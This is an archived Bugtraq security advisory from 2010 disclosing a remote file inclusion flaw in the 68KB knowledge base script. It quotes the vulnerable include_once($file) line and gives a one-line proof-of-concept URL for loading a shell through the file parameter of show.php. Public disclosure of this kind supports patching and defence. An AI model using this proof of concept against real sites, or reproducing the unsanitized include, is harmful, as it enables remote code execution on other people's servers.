Home page logo
/

bugtraq logo Bugtraq mailing list archives

68KB v1.0.0rc4 Remote File Include Vulnerability
From: g1xsystem () windowslive com
Date: 3 Aug 2010 11:12:41 -0000

================================================
68KB v1.0.0rc4 Remote File Include Vulnerability
================================================


 1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
 0     _                   __           __       __                     1
 1   /' \            __  /'__`\        /\ \__  /'__`\                   0
 0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
 1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
 0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
 1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
 0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
 1                  \ \____/ >> Exploit database separated by exploit   0
 0                   \/___/          type (local, remote, DoS, etc.)    1
 1                                                                      1
 0  [+] Site            : Inj3ct0r.com                                  0
 1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
 0                                                                      0
 1                    ########################################          1
 0                    I'm eidelweiss member from Inj3ct0r Team          1
 1                    ########################################          0
 0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1


Vendor:     http://68kb.com
download:   http://github.com/68designs/68KB/downloads
Author:     eidelweiss
Contact:    g1xsystem[at]windowslive.com
Original Advisories :   http://eidelweiss-advisories.blogspot.com/2010/08/68kb-v100rc4-remote-file-include.html
=====================================================================

Description:

68KB is an open source PHP MySQL driven knowledge base script. Built with you in mind to make it easy to configure and 
setup.

Note:
This is the same vuln in other lower version (http://www.exploit-db.com/exploits/11904/)
Vendor Not Fix the vulnerability in all folder !!!

=====================================================================
 
    -=[ vuln c0de ]=-
 
[!] path/themes/admin/default/modules/show.php


        <?php include_once($file); ?>
 
 
=====================================================================
 
    -=[ P0C ]=-
 
    http://127.0.0.1/path/themes/admin/default/modules/show.php?file= [inj3ct0r shell]
 

 
=========================| -=[ E0F ]=- |=================================


# Inj3ct0r.com [2010-08-03]


  By Date           By Thread  

Current thread:
  • 68KB v1.0.0rc4 Remote File Include Vulnerability g1xsystem (Aug 03)
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]
AlienVault